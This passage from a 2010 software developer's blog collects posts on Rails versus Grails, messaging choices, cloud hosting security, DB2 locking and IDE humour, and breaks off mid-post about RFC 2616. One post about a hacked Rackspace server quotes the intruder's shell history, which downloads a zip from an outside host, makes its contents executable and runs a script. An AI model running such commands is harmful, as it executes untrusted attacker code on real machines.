Tuesday, December 28, 2010

Making the MQ versus RPC decision

Among many software architects and pundits, Message Queue solutions have a lot of press about being a highly scaleable solution in comparison with RPC based solutions. From what I can see, the biggest problem with most comparisons is that they start with the premise that one or the other of these two approaches is superior and then spend time trying to make a compelling argument why they are correct.

I'm going to throw my hat in the ring on this issue and offer a high level guide for folks who don't have the time or energy to dig into queuing theory or debate with ivory tower architects about the issue. You'll note that scaleability is not even a factor. This is deliberate as scaleable and performant solutions can be built using either pattern. There is an interesting performance comparison that seems to indicate that the performance characteristics are very similar for both approaches. I WILL point out that simple http-based RPC solutions DO have fewer middleware requirements and are almost universally accessible. Furthermore, I'll point out that it is entirely possible that a real world solution may need both.

In any event, some strong indicators you'll likely need an MQ based solution include:
  • I need multiple endpoints to subscribe to my message
  • I need durable messages that can be delivered even when the message destination is not running

From my perspective, if any of these are necessary, then some sort of MQ technology is probably appropriate. Certainly, if you try to build a custom solution to either of those problems, you're highly likely to be wasting your time.

On the other hand, some equally strong indicators that an RPC solution is probably your best choice:
  • I need clients to get an answer immediately
  • I need a very small footprint and performance and simplicity are more important than reliability

The first bullet is most important above, synchronous message queuing patterns (e.g. request/response) typically come with a lot of baggage that may be hurting both your performance AND your scaleability.

I've worked with a variety of solutions using MQ series, JMS providers, and Biztalk, used both appropriately and otherwise. In every case I can remember, if we had used the above guide, we would have had a better chance of picking a the most appropriate solution and also arrived at the conclusion more quickly.

Sunday, December 26, 2010

My experience at Denny's and three rules for success

I recently went out to breakfast with my family at our local Denny's restaurant. We arrived around 9:15am and there was a pretty "interesting" line of folks waiting to be seated. In retrospect this should have been an indicator that something was wrong and things were going to be slow.

We finally got seated and our server promptly brought menus and took our order, then we settled down and began waiting for our food. While waiting at out table, at least 6 other groups came in after us, were seated, ordered, got their food, and left.

After about 30 minutes, the greeter actively started telling people that the food was going to take from 30-90 minutes to prepare and people stopped being seated. In addition, while the greeter was saying this to new customers, our server kept telling us the food would be out "in just a little bit". By 11:00am, I was pretty irritated because our breakfast had turned into lunch and all the other places to eat in the area were now open (note, Denny's was NOT our first choice).

Finally our food arrived, we ate, and I had the dubious honor of talking to the manager about what went wrong. It turns out they only had one cook... normally this is a problem, but then they had a bunch of people show up, everyone panicked, and things went downhill fast. In effect, the entire attitude was that "it's not our fault"... unfortunately, I didn't really care who's fault it was or wasn't, I cared that I sat around for 1.5 hours waiting for some food I could have prepared myself in about 30 minutes.

This brings me to my three rules:

#1 When things get out of hand, tell your customers immediately. They are NOT going to be happier if you make them wait longer wondering what the heck is going on. Notice I didn't say "if". That's deliberate, I know "stuff" happens, reasonable people will get it.
#2 When things seem to be getting out of hand, adding another cook might not help. What seems to have happened in our case is that a few other employees tried to help the cook and screwed things up. Everyone started getting irritated, arguments started, and things started to spiral out of control.
#3 Treat your EXISTING customers as good or better than new ones. If they had approached me 30 minutes into the debacle and said "we're running a little slow, are you sure you want to stay, it might be another hour" I probably would have left. Yes, I would have been upset, but not nearly as upset as after waiting for 1.5 hours (with two kids under 5 by the way). Note, wireless companies, satellite, cable, and other companies could learn something about this too. I'm tired of wonderful deals for "new kids" and me getting substandard service because I'm already "hooked".

Wednesday, December 22, 2010

Rails, Grails, and convention over configuration

Back in 2003 I wrote a quick application generator using turbine, java, and xml and published to sourceforge called thrust. It is extremely primitive by today's standards, but the important point is that is embraced the "convention over configuration" concept.

I now see a lot of folks jumping into rails/grails without really thinking about what it really means and what the proper application of these tools might be. For example, I see folks deciding that rails/grails is the best development environment for them to build an application, then subsequently decide to write custom code for every thing. While rails/grails are still really good development frameworks no matter what, in many regards deciding to override their default behavior instead of understanding the patterns and embracing them is selling the idea short.

In my experience, I see many software applications as a similar pattern applied to itself. Rails/Grails (and thrust) are designed to exploit this and enable an exponential speedup in development time as well as a reduction in apparent complexity. I say apparent complexity because it still exists, but the framework should absorb the essential complexity (the part you cannot get rid of) and hide it from the developer in most circumstances.

Lets use an example: Suppose you are writing an application with a collection of screens that allow you to edit some information in tables in a relation database. Using any of these three frameworks, you can define a template that all these screens should use and automagically generate a good starting point for most of your screens (CRUD) + directory listing per entity.

If for some reason, you have no need for CRUD or a listing, or if you aren't using a database... you might be using the wrong tool for the job. That's not to say that these frameworks are not useful in this context, but you might not be getting the value that you COULD have from it.

Monday, November 29, 2010

The internet is causing the world to shrink

I was reading up on the history of communication here and had to pause at how quickly things are changing. From the invention of written communication (3500BC) until the invention of the optical semaphore (1793), instantaneous and lossless long distance communication has been limited to how far you can shout/see. The rate of communication outside that range was limited to a max of about 200miles per day (speed of a horseback rider).

This means, that for 5000 years it would take 1.5 days to send a message from Rome to Milan. Starting in 1793, this rate began to accelerate as a visual semaphore could drop that time significantly, but there was a huge amount of infrastructure to get this working. You needed towers, telescopes, and other things to make things work.

In the space of 40 years, the electric telegraph greatly lowered the cost of long distance near light speed communication. For remainder of the 19th century, wired telegraph and eventually wireless telegraph lower the cost of high speed and distant communication. While the actual transport happened at or near the speed of light, the encoding cost slowed things down. Wireless telegraph was FAST, but nobody really had that in their house so they had to walk to the telegraph office and have a specialist encode the message.

In the 20th century, the advent of in-home telephone and television enabled nearly instantaneous worldwide communication. In the 15+ years since WWW began, the actual speed of communication has somewhat maxed out. You can't get much faster than light and short of passing messages through the earth instead of around, you'll have to accept a few hundred milliseconds of latency. Effectively, the entire world is living together. What would have taken days, months, or even years to communication even 100 years ago, can now happen instantaneously.

This means that the communication barriers caused by geographic dispersion are now effectively gone. If you can get an Internet connection, you are within shouting distance of the entire world.

Sunday, November 28, 2010

If IDE's Were Star Wars Characters


Rational Application Developer


Jabba the Hutt - BIG, SLOW, but also somehow powerful. You don't want to get on the wrong side of this IDE as you will be frozen in IBM consulting carbonite and NEVER get anything done.

Netbeans


Luke Skywalker- The hero who wins against all odds. However, In the software development universe, Luke actually turns to the dark side and joins Darth Vader.

Visual Studio


Emperor Palpatine - Having harnessed the dark side of the force, more powerful than you can ever imagine.

Oracle JDeveloper


Darth Vader - In the software world, after having turned Luke to the Dark side, Darth Ellison and Luke rule the Galaxy as father and son.

TextMate


Han Solo - Always seems to be there at the right time to help you out of a bind. No aspirations to rule the universe, but knows how to "get things done".

Eclipse


Battle Droids - There are millions of these, but they're all centrally controlled by someone whose motivations may be suspect. In the software development world, battle droids are actually secretly controlled by Samuel the Hutt.

Delphi

Yoda - In the software universe, much like in the Star Wars universe, he may be a powerful Jedi, but he's dead.

IntelliJ


Obi wan Kenobi - Strong in the force, but for some reason he lives in obscurity on a desert planet. He and Joda live on in some mysterious way that we don't quite understand.

Notepad


An Ewok - Cute, might be actually useful, but do you seriously want to try and rule the universe as an Ewok?

Gedit


R2D2 - Very useful, behind the scenes kinda hero. Never going to rule the universe, but someone you certainly want to have around all times of possible.

Flash Builder


Padme Amidala - Not sure what to say here.


Others?

This is my list so far and I realize it isn't really complete. Comment and I'll try to update with your ideas...

Saturday, November 27, 2010

Why you should purchase Intellij.

Aside from supporting ruby, java, groovy, flex, and about a million other things, they actually have customer service. I don't mean "faceless mindless 3 levels of useless buearacracy" customer service, I mean "Holy crap, this guy WANTS to solve my problem" customer service.

Recently I sent a note to intellij about an annoying, but not SUPER critical problem, to RAD or WSAD users (or just about any other software package), tell me the last time you sent an email and got this sort of help from a real person.


Hello Michael,

Please define "crashes".


Serge Baranov
JetBrains, Inc
http://www.jetbrains.com
"Develop with pleasure!"

-----Original Message-----
From: "Michael Mainguy"
Sent: Tuesday, November 23, 2010, 7:29:23 PM
To: feedback@jetbrains.com
Subject: IntelliJ IDEA 'Feedback'

Product: IntelliJ IDEA
Build: IU-95.627
OS: Windows

Name: Michael Mainguy
Country: United States
TimeZone: America/Chicago
Evaluator: true

> Are you generally satisfied with IntelliJ IDEA? How do you rate the product?
Generally yes, very good

> What features appear most useful? Are there any problems?
Yes, GWT 1.4 project crashes when I try to change project structure.

> Are there any features you'd like to have but did not find in IntelliJ IDEA?
Not yet.


!DSPAM:5,4cebebe5140651748229832!


Note, he emailed me at 10:31 the next morning when I sent my note at 7:30 pm the night before...

So I reply to him at 12:55

By crash, I mean I get a little popup with a stack trace that I can't seem to copy. The IDE itself remains running and seems to not have any other problems.

Maybe crash is not the right word... but I'm the user so get to make vague overstatements right? ;)

If I could figure out how to get a copy of the stack trace I'd report a bug, but I'm busy fumbling along without the debugger for the time being.
- Show quoted text -


I hit send, then turn to ask a coworker a question, when I turn back:


Hello Mike,

There should be blame button which will post stacktrace to us. Also
is should be possible to copy from this dialog by selecting text and
pressing ctrl+c.

Exception is also logged in
USERPROFILE\.IntelliJIdeaXX\system\log\idea.log (where XX is IDEA
version) or ~/Library/Logs/IntelliJIdea90/idea.log if you are on Mac.

Serge Baranov
JetBrains, Inc
http://www.jetbrains.com
"Develop with pleasure!"

I felt a little like Serge is the sneaky butler from Mr Deeds or at a minimum, a Jimmy Johns Delivery guy. In the next email exchange, he gave me some instructions on how to fix the problem (delete broken findbugs plugin metadata) and my issue was resolved.

The sad thing is that my expectations were so low, that actual customer service is seen as "over the top". I issue an open challenge to any owner of RAD to share a similar experience with customer support form IBM for their tool that costs over 10x more than mine. I won't even engage in a debate about the features of RAD versus IntelliJ since those are pretty subjective. After all, I've only met a handful of people who ever actually enjoyed working with RAD and most of them only used 10-15% of the "features" in the tool.

While I still use eclipse and actually like STS, Intellij Idea is so much more convenient and their customer service is so spectacular that I highly recommend it for anyone doing development in the java/ruby space. Just so we're clear, here's what intellij idea supports out of the box:Java, JavaScript, HTML/XHTML/CSS,
ActionScript/Flex/AIR, XML/XSL, Ruby/JRuby, Groovy, SQL, FreeMarker/Velocity, PHP.

In addition, it supports a number of other languages with plugins.

Thursday, November 18, 2010

GWT is not a substitute for a web developer

Web development is often hampered by the fact that there are a variety of web browser rendering engines as well as a variety of javascript interpreters. This means that a developer might have to recode the same web site 4-5 times to account for all the variations. When you couple that variation with the fact that new browsers are released and developed all the time, people started to realize that there needed to be a "one stop shop" to write your code and run it anywhere.

I suppose someone at google started down the GWT path because "write once run anywhere" has been Java's watchword almost since it's inception and a software holy grail since the 1970s. A basic problem with GWT is that it tries to give a java api for building screens which is alien for almost all web designers and front end developers. This means that there is an additional translation from "designer" world into "developer" world.

Recently had the pleasure to muddle through some GWT code and I don't really like what I see. For folks who don't know, GWT (I love TLAs) is tool that enables developing web front ends in pure java. This is done by running a custom compiler against java source code that outputs javascript. The cross platform capabilities get added in by generating 5 different javascript files, one for each browser platform you are targeting.

Because of this, some shops appear to try and co opt java developers and encourage them to build web front ends and this is NOT a good idea. Does this mean a good web designer or user interaction person who knows java (or visa versa) won't be able to make great things with it? Of course not.... But it does NOT mean that a band of capable back-end java developers will be able to suddenly developed a rock star web 4.0 interactive application because "they know java" and "we're using GWT".

GWT does NOT give java developers magical design abilities, nor does it somehow make a java backend developer able to write wicked fast javascript. It DOES enable a person who understands javascript and web design as WELL as java to build cross platform applications MUCH faster than they if they tried to do it themselves.

In conclusion, GWT certainly has it's place in a capable software developer's toolbox as a mechanism to build screens, but as a replacement for front end developers or some sort of attempt at replacing knowledge of how browsers work, it is a pretty bad idea.

Tuesday, November 16, 2010

Architecture and Scaling Cloud Applications

OK, quickly, you've got a new app that has gone "off the charts", it's hosted on EC2 and you want to be able to scale in order to meet demand.

What do you do?

While this is a great situation, too often the answer technical people come up with is either:
#1 (customer answer) We need to get someone else to build this us, our IT guys don't know what they're doing.
#2a (developer answer) Rewrite the app in (erlang, scala, ruby, java, C#) because our code sucks and isn't scalable
#2b (developer answer) Switch to (Oracle, DB2, MySql, MongoDB, Terracotta, Spring, EJB3) because (Oracle, DB2, MySql, MongoDB, Terracotta, Spring, EJB3) doesn't scale well
#3a (infrastructure answer) We need to buy more EC2 instances and "scale out"
#3b (intrastructure answer) We need to bring it in-house and we'll get the biggest baddest server you can buy
#4 (architect answer) Where's the bottleneck?

OK, I know #4 isn't really an answer, but it illustrates the problem. The architect's job is to fully understand the problem and help guide discussion about what possible solutions are. I've met a lot of architects and usually can tell what their background is after a discussion like this. The well rounded folks will typically ask a lot of questions before jumping to a conclusion about the best answer. The folks who grew up in the business will choose #1, Developers #2, Infrastructure #3, and rarely you'll get a #4.

That having been said, the best answer is probably to get ahead of the problem and build scalability into your design. For dynamic web applications this means you should adopt the following positions:

#1 My application might be hosted on a laptop with an in memory database, or it might be hosted on 52 app servers with 12 database instances - my design shouldn't require large changes to accomodate either.
#2 My URL scheme matters (even down to DNS) and should reflect unique identities of resources that my application deals with (see REST AND use proper http verbs where applicable.
#3 Don't panic

So what does this really mean?

For one, the days of writing a J2EE app, and/or SOAP as the best way to do things are past. While J2EE can scale up easily and theoretically even scale out, it's just too dang expensive and difficult to get that to work well (unless you like throwing money at problems). Why?

First off, most J2EE containers (and applications) are designed around the idea that you have a big chunk of shared memory and multiple processors available. As an example, many of the shared resources rely on thread pooling. This has some serious drawbacks when you start getting into extremely high load. All those thread pools need overhead to manage each other's state and that management affects your entire application as all those CPUs start to melt down doing thread management activities.

Second, SOAP is basically a more web centric platform independent replacement for CORBA... Because of it's design, it requires a bit more work than simple URL parsing to be able to scale it. Add to this the problem of xml marshalling and you'll quickly devlolve into a big mess of performance and scalability problems.

These problems aren't the only ones, nor are they limited to J2EE and web services (.Net suffers from similar problems), but they are indicative of a bigger problem brewing in web application development and architecture. To get ahead of this, start thinking about what is is REALLY NECESSARY to run your application. It may be surprising how much extra "stuff" you've added in "just in case" that is not only hampering development tempo, but also potentially slowing you down at runtime.

Tuesday, November 9, 2010

Just enough math to be dangerous



Next time you find yourself in a pointless argument with someone who "knows" statistics, remember the bottom statistic.

On the flipside, it took me at least 30 minutes of watching videos and reading explanations to figure out how it could even be possible to propel something directly downwind, faster than the wind, propelled only by the wind.

Wednesday, November 3, 2010

Cloudant couchdb is free

I've been investigating methods of storing content online and ran across an interesting offering from cloudant. They offer a 2gb couchdb database for free. For folks who don't know, couchdb is a json/RESTful distributed document database. If you're trying to manage online content for a web application it has some interesting advantages over the competition.

The most interesting advantages to me are:
  • Native RESTful javascript/JSON API. The database itself uses http as the communication protocol
  • Inherent MVCC support. This means old versions of a document live after they've been updated
  • Built-in searching and materialized views. I can define some metadata about my content and instantly retrieve it

Some of the competition in this case would be:


While it turns out that S3 and MongoHQ both have free offerings, the online console at cloudant is the most user-friendly (as of this second).

Wednesday, October 27, 2010

Rails and grails package management

Next on my agenda for comparing these two frameworks is package (aka dependency management). Up until the release of Rails3, I would say grails was the hand's down clear cut winner in this regard. Grails was engineered from VERY early on with the idea of dependency management being core to the framework. IMHO, this further illustrates how grails advanced the state of the art by sanding off some of the rough edges off of rails. If I were in charge of an IT department, I still think grails has a bit of an edge from a management perspective, but it does lose out a little in the flexibility department.

Ruby (via the gem mechnism) still suffers greatly from "gem hell" problems. Rails3 takes a step in the right direction by making bundler a core part of how applications are configured. Grails, on the other hand, is moving toward using maven as it's standard dependency management solution. In addition, grails has supported this for a number of years now and it works pretty well.

Where grails and maven suffer is that they are VERY opinionated. Unless you embed a jar directly in your project, it is very difficult to deviate from the "maven" way of packaging things. This means that building off a dev/snapshot package can be problematic (especially if you need to switch repositories often). Rails/Bundler on the other hand, while still pretty opinionated, let's you pick the method you want to pull your dependencies in. You can pull individual gems from git, some stuff from github, some stuff off your local machine. By embracing the culture of "everyone pitch in" they are offering the most flexible possible solution.

On the other hand, asking 3 people how to properly include a library in a rails project will likely net you 4-5 different answers. Grails, by contrast, will likely only get 2 answers...

Which of these two methods is better is left to you... I prefer the flexible approach of rails when developing software, but the more controlled mechanism of grails when maintaining software and infrastructure.

Tuesday, October 26, 2010

Rails and grails job scheduling

In my continuing comparison of ruby on rails to groovy and grails I've discovered another big difference. Grails has excellent support for job scheduling, whereas the existing rails plugins are confusingly complicated.

In grails, to set up a job, install the quartz plugin

grails install-plugin quartz
grails create-job MyJob

and edit the new class called MyJob

class MyJob {
static triggers = {
simple name: 'mySimpleTrigger', startDelay: 60000, repeatInterval: 1000
}

def group = "MyGroup"

def execute(){ print "Job run!" } }


Done, you now have a job running inside your application running at a repeating interval. The pluging supports cron-like syntax as well as custom triggers.

Rails, on the other had (much like perl ;) has more than one way to do it. The biggest thing I notice is that most of the rails plugins either #1 require you to schedule a unix cron job example or #2 require you to run another ruby process to do the scheduling example. The fundamental difference is that the "ruby way" is to create a new process manually instead of forking a process or new thread in the initialization of your application (like the java/grails way).

Some other ways to do it from the rails wiki.

In short, background job scheduling is something that grails took a completely different approach with. By leveraging the quartz library and embracing all the multithreaded goodness that is a modern J2EE container, grails makes a compelling case for "this is the way you do it". Rails, on the other hand, for all it's "convention over configuration" talk, has a rats nest of confusing methods to accomplish a fairly routine and simple task.

The fundamental problem with this sort of activity in rails is that the underlying architecture isn't designed around the concept of a long running processes that service multiple simultaneous activities. In my head, this is a pretty important consideration when you start thinking about managing more than a simple CRUD application. The rails way is to essentially ignore this and let folks run amok building random plugins. The grails way is to treat this as a fundamental (though optional) part of building web applications.

Monday, October 25, 2010

Technology and programming trends

As technologist, I'm always keeping my eyes on the market. There's nothing worse from a marketability perspective than being the best chariot wheel repairman when the entire world has moved on to automobiles. If you're going to be in a niche, you better be in one that is HIGHLY lucrative.

To this end, I took a look on indeed.com and tried to see how various programming languages stacked up as far as job postings.


Obviously this is not comprehensive, but it shows what I "kinda" already knew. C is king, with java taking a large secondary position and C# following up behind java. One thing to note is that that largest percentage shown on that chart is 4%. This roughly means that the market is SO fragmented that a large leader only captures 4%. For the COBOL folks clinging on for dear life... Hopefully you're near retirement age because right now finding a COBOL job is going to be pretty difficult.

Now for a more interesting perspective. Let's rescale everything relative to what it's position was a few years ago and plot the numbers are percentage growth.


Whoa! This paints an interesting picture. We see that a few new upstarts (erlang, ruby, and groovy) are taking off. Furthermore, we see that of those 3, ruby actually scores higher in absolute market than a lot of established players.

These charts, however only show a part of the picture. Right now, mobile, social media, and cloud technologies are just as important skills as purely using a particular programming language. In fact, the value of twitter (for exmample) is not really from the languages used (scala, ruby), but for the social effect gained by using the technology.

For the next group, I eliminated C just because it was so much higher than everything else, but also because a lot of C positions are for things that aren't really trending upward. So now let's look at a few "hot" technologies scored against some programming languages.


We can see that while the mobile/cloud/social space seems to not have broken too far into the market yet. However, when we look at growth.


We see that twitter (holy smokes) facebook, and iPhone are all growing exponentially upward. Now part of this is because they haven't been around very long, but if you take away the leaders and REALLY look at the numbers.

We can see that, while the market is still relatively small, it is fairly large .6% (or roughly 1/6th that of the leader... C) and that coupled with large growth indicates to me that it might be a good place to be. Note, I added sharepoint to the second slide because I keep seeing postings for it and it DOES seem to have a nice position... It's growth, however is linear, and I'm more interested in the rate of increase of the growth for the time being.

I realize this isn't a highly scientific study and there are a ton of holes in the analysis, but the point is that things are starting to break free of the traditional "I'm a java guy" perspective and trending toward technologies that require integration. In addition, showing how small a market the leading language has, there is a compelling case to be made for being a polyglot.

Thursday, October 21, 2010

Hacked Server on Rackspace

Last month, I had a cloud server exploited and couldn't figure out how it happened. After a little investigation, I've got a good news bad news situation. The good news is that I DID manage to contact someone at rackspace who could help me out and they re-enabled my account.

The bad news is that the server wasn't pretty. On the upside it must have been hacked by a script kiddie as they did NOT cover their tracks very well at all. On the downside, they did NOT appear to have used the single user account I created and somehow entered through either the rackspace admin network (SPOOKY, inside job?) or one of the default services installed with Ubuntu 10.04 LTS (still not good)

From my root .bash_history, I noticed the following (the first few lines, may have been me):
exit w                                                                                                                     
w                                                                                                                      
passwd                                                                                                                  
cd /var/tmp                                                                                                             
la                                                                                                                      
wget hacker.go.ro/go.zip                                                                                                
unzip go.zip                                                                                                            
cd go                                                                                                                   
chmod +x *                                                                                                              
./go.sh 112                                                                                                             
cd /var/tmp                                                                                                             
cd go                                                                                                                 
chmod +x *                                                                                                            
./go.sh 220       

In my /var/tmp/go directory I have a bunch of stuff that I'm looking at right now, but of specific interest are a couple of Chinese servers that appear to have been used in the heist.

In short, Rackspace did a good job during "normal business" hours of helping me out, but I certainly ran into a few pretty serious drawbacks. Notably:

#1 By default, servers are built and exposed to the internet immediately.
#2 There is no mechanism to set up mini DMZs or other ways to cordon off traffic, except through software controls (on servers that are already potentially p0wn3d).
#3 There is no weekend support as far as I can tell.

A big plus to having the server physically sitting on site is that, unless you get locked out of the server room, you can ALMOST always reboot the server from a CD and reinstall the OS. If your hosting provider decides to disable your cloud network console, you're kinda out of luck.

Overloaded terms in the Ruby community

I've been refactoring some tests and changed them from using a global set of users/roles defined as fixtures to instead be factories.

OK, for java folks I'm going to give you the secret ruby decoder ring.

Fixtures = predefined data that you create by manually seeding via seed.rb
Factories = data generated via a factory method at runtime

It's interesting that the ruby community has decided to overload the meaning of these terms to be very specific. I say this because in the "rest of the world" when dealing with testing, a test fixture is a much more generic concept. Typically it is the thing that sets up the test and tears down the test. Yes, often it creates data, but that is not necessarily it's job.

Factories = This is a term that alludes to a well known and fundamental design pattern that can be used for a million different things and honestly has fallen out of vogue with java folks in favor of using dependency injection instead. It seems many folks think that using a factory to generate data for a test case has some inherent advantage over using pre-seeded global data (or other patterns). The primary advantage stated is that it moves the generation of the data closer to the thing being tested.

This is a very good reason, but it doesn't actually eliminate fixtures (generally speaking), it simply moves the fixture from a global scope into a more specific scope. The obvious downside to this is that for things that recur in multiple scopes, you are now repeating yourself.

Wednesday, October 20, 2010

Ruby on rails and groovy grails comparison

As a person who has had the luxury to work in both ruby on rails and groovy grails, I've found a few differences that make their approach quite a bit different.

#1 Groovy allows you to write java. While this isn't a huge deal, it can be both a positive and a negative. I've worked on teams where folks treat grails as a super simple java framework and never leverage any of groovy's dynamic goodness. While this isn't a huge problem, it does delay (or eliminate) to transition from J2EE xml configuration file hell into a more dynamic way of coding.

#2 Ruby forces you to learn "the ruby way". For folks who are only used to java, seeing ruby code is like...seeing another language. Because of this, the idioms used in java are more quickly forgotten and you more quickly become a ruby native because you MUST. Only having worked with a few other people while they moved from java to ruby, I can only speak from my personal experience. I can say that ruby's syntax is not THAT much different as long as you keep an open mind, and I found I was able to more quickly learn the "ruby way" than I was able to learn the "groovy way" simply because I was FORCED to do it with ruby.

#3 Rails uses db migrations by default. This is a huge plus for db CRUD applications. It enables you to make sure you have a migration path from version to version of your code. Grails, on the other hand doesn't come with anything (by default) to handle this.

#4 Rails has a sparse model class definition. Should you NOT decide to use db migrations, you can simply create some tables in your database, create an empty ruby class, and begin using it. You don't need a class definition that matches the db table, because the fields are put on the class via introspection of the table. This then frees you to only implement business functionality on your model.

#5 Grails integrates seamlessly with most modern J2EE environments. Newer versions of spring allow you to code groovy code INSIDE your spring configuration xml. Grails creates a war file that can be deployed with little or no modification directly into a J2EE container. Rails CAN be integrated in a similar fashion, but it is really a kind of frankenstein implementation to get JRuby on rails via a J2EE container.

#6 Ruby on rails is MUCH more nimble and dynamic for building functionality. Grails enables taglibs and meta-programming, but many of the DSLs quickly get cluttered with java-like confusion that doesn't really have any business advantage. In addition, because of the way grails works with classloading in servlet containers, it is constantly restarting the container to pick up new functionality. With rails, I can reinitialize the database, drop/create tables, completely redesign the application, and it will typically continue to run without a hitch. I've often gone an entire day add/removing domain classes, changing controllers, rebuilding tag libraries and my rails engine never has to be restarted.

#7 The groovy and grails community is more organized. That having been said, they're both pretty disorganized and certainly the "herd of cat's" syndrome is running rampant in both of them. However, when I google "groovy roadmap", my first hit is this http://groovy.codehaus.org/Roadmap, "ruby roadmap" gets me: http://redmine.ruby-lang.org/projects/ruby-19/roadmap. You choose which one seems more organized.

#8 The ruby community is larger. While still pretty small compared to the likes of PHP or java, you cannot throw a stick and help but hit someone who has at least heard of ruby on rails. Groovy/Grails is still pretty small. On the other hand, I would point out that the grails community is growing where the rails community growth seems to have leveled off in the last year or so.

In conclusion, there are a lot of other factors that make selection of one or the other of these better or worse. If I where to learn only one of these and had no prior experience, I would probably learn ruby and rails just because of the size of the community. If I were a java person, I would likely start with groovy/grails just because the learning curve is going to be less steep.

Friday, October 8, 2010

jQuery ajax performance tuning

Modern web applications are all about user experience and a major factor in this is performance. A user interface that is laggy or gives the appearance of slowness will drive users away as quickly, if not more quickly, than an ugly and unintuitive one.

This having been said, sometimes there are things that are just plain slow. Answering questions like "calculate the price for all 2 million products we sell in the north american market and present the top 10 with at least 50 in stock at a Distribution center within 50 miles" can often take some time. Couple these complex business rules with rich and powerful user interfaces and you have a potential for slowness to silently creep into your application. Digging through a few of the more modern javascript libraries, there are a number of strategies to combat this. We'll use the jquery datatable to illustrate some simple speedups that might apply.

For our situation, let's pretend the above mentioned query takes 500ms and the time to actually render the html for the rest of the page takes 500ms (until document ready). There are three general ways to get your front-end widget to initialize. In the interest of simplifying things, we're going to assume outside factors (like network congestion, server availability, etc) are not influencing our decision.

method 1 - put the data in the html/dom

This is often the simplest way an has the added benefit of often degrading when a user is has a browser that doesn't have javascript enabled. The down side is that the trivial implementation will generally require the aggregate of the two times in order to complete (read 1 second)

method 2 - put the data as an ajason request (not ajax, because who uses xml on the web any more?)

This has the benefit of enabling the server to send back the core html (500ms) and THEN fetch the rest of the page. This means the user has SOME content in 500ms, and instead of staring at nothing (or the old page) for 1 second, they see SOMETHING in 500ms. This has the downside of actually requiring the same amount of time (if not more) than the above method. The biggest benefit is that is CAN make the system seem more responsive.

method 3 - put the data as a javascript include

OK, this one is a little whacky, but can make things even faster than either of the two above. In this method, instead of wiring the data into an xmlhttp request that is fetched after the DOM is loaded, you put a link in the document (probably the head) that points to a dynamically generated javascript file that will wire the content into the dom as soon as the required parent element shows up. This has the advantage of allowing the fetch of the data to proceed BEFORE the dom has fully loaded. In practice, this starts to become more performant when you have larger documents with complicated controls and markup in them.

I don't necessarily recommend this approach as a defacto starting point. Before going down this path, you should make sure you've done the following:
  • minify and consolidate all your css and js
  • consolidate and pack all your images
  • use a cdn or edge server for static assets and content
  • properly set cache-control headers and usie etags where appropriate

Don't start with this approach, but it is certainly a way to squeeze a little more performance out of your user interface.

Wednesday, October 6, 2010

Amazon EC2 versus rackspace cloud hosting

I recently needed to stand up a DB2 server and was going to reach for my trusty rackspace account, but didn't feel like setting up DB2 for an experiment that would only last a few hours.

Instead I turned to amazon. It turns out that amazon has preconfigured images for ubuntu/db2 that you can spin up almost instantaneously. In addition, their security model is a little more robust. Key things they do right from a security perspective (compared to rackspace).

#1 They never send you a root password (via email or otherwise). You must generate a public/private key pair and download the key via https. Assuming you keep your secret key secure, there is minimal (if any) opportunity for someone to steal this key. Even if they hack your amazon account, I'm not sure they could get to your server immediately, even though they certainly could shut it down.

#2 By default you are behind a firewall so that only a minimal set of tcp ports are even open. You need to actually take action before they will allow ssh access to the server.

#3 The root account is locked and cannot log in from a remote location. You MUST log in via a "normal" user (ubuntu on this image) and then switch to root.

All told, it seems like EC2 has got a more secure default setup than Rackspace. I haven't yet compared pricing or service levels on the two, but purely from a security perspective, RackspaceAWS certainly has got it's stuff together.

Monday, October 4, 2010

db2 locking and MVCC

I had an interesting discussion about locking in db2 a while back. It was interesting because it challenged some long held assumptions I had about db2 and how it handles locking. As usual, when I started digging deeper it turns out it is much more complicated that it would seem on the surface.

First off, some background: I was having a conversation with a colleague about locking in various DBMS's and I made the statement that DB2 doesn't support MVCC. Thus, I contended, it is not possible for someone to read the previous version of a row that I have updated while I'm in a transaction that has altered it. At this point the fellow I was talking to looked at me as if I had just grown an arm out of my forehead. He stated (correctly, it turns out) that DB2 has supported this almost forever.

I was, however, VERY confident that I was correct and subsequently dug up the documentation. Oddly enough, the documentation seemed to support the notion that I was mistaken (gasp!). Well, at this point I HAD to get to the bottom of this.

So, I fired up an amazon ec2 instance with ubuntu and db2 9 udb and started my test.

First, I created a table
create tablespace test1
create table test (id integer)
keep forgetting that the more confident I am that I'm 100% correct,


Then fired up squirrel sql with two different connections turning off autocommit.
First I seeded some data:
insert into test values (1)
insert into test values (2)
commit
On connection 1 I entered
update test set id = 12 where id = 2
and on connection two I entered
select * from test where id = 1

When I issued the second select, in my head, I should have blocked for the first insert to finish,but it came back immediately. So now I had to sit back and wonder: "Am I imagining this behavior?" When I stop to think about it, my position seems suspect not matter how you slice it.

So I reread the definitions of db2's lock levels http://www.ibm.com/developerworks/data/library/techarticle/dm-0509schuetz/ as well as some ways things can go haywire http://www.ibm.com/developerworks/data/library/techarticle/dm-0509schuetz/ and got thinking back to the situation that caused me to think this.

The key thing that I was missing is that this ONLY applies to readers, if I change the second statement to an update, it WILL block (by default). So for example, if we run THIS sequence:
On connection 1 I entered
update test set id = 12 where id = 2
and on connection two I entered
update test set id = 100 where id = 2

The second update will wait for the first one to finish. By comparison, in an MVCC database, the second one can continue to operate with the version of the row as it was when its transaction began. This is they key thing that kept confusing me. DB2 treats readers and writers as unequal partners in the database instead of putting them on equal ground. While readers typically don't block, it's the writers that will cause problems.

In honesty, it sounds like there IS a setting in newer versions of db2 to enable MVCC-like behavior, but is NOT the default. In addition, there is certainly overhead to maintaining versions of data just to keep writers running concurrently. Certainly for read intensive operations, it might not be worth the overhead.

For a nice article, take a peek here: http://www.rtcmagazine.com/articles/view/101612

Mike.

Saturday, October 2, 2010

HTTP 1.1, rfc 2616 and reading comprehension

I've read with interest some documentation from Microsoft about how the HTTP 1.1 specification mandates some behavior. To Quote:
WinInet limits connections to a single HTTP 1.0 server to four simultaneous connections. Connections to a single HTTP 1.1 server are limited to two simultaneous connections. The HTTP 1.1 specification (RFC2616) mandates the two-connection limit.

This seems to be saying that browsers are only allowed (via some mythical mandate) to use two connections per server and any connections past two must block. After reading through the http 1.1 specification (again) I'm troubled that many folks have seriously misinterpreted this requirement. This is especially troubling because the manner in which RFCs are written is VERY explicit and it is (for me) really easy to understand the difference between a requirement and a recommendation. What is even more troubling is that people quote the microsoft reinterpretation of the specification as if it is a direct quote of the specification.

So for my example, the top of RFC 2616 states:
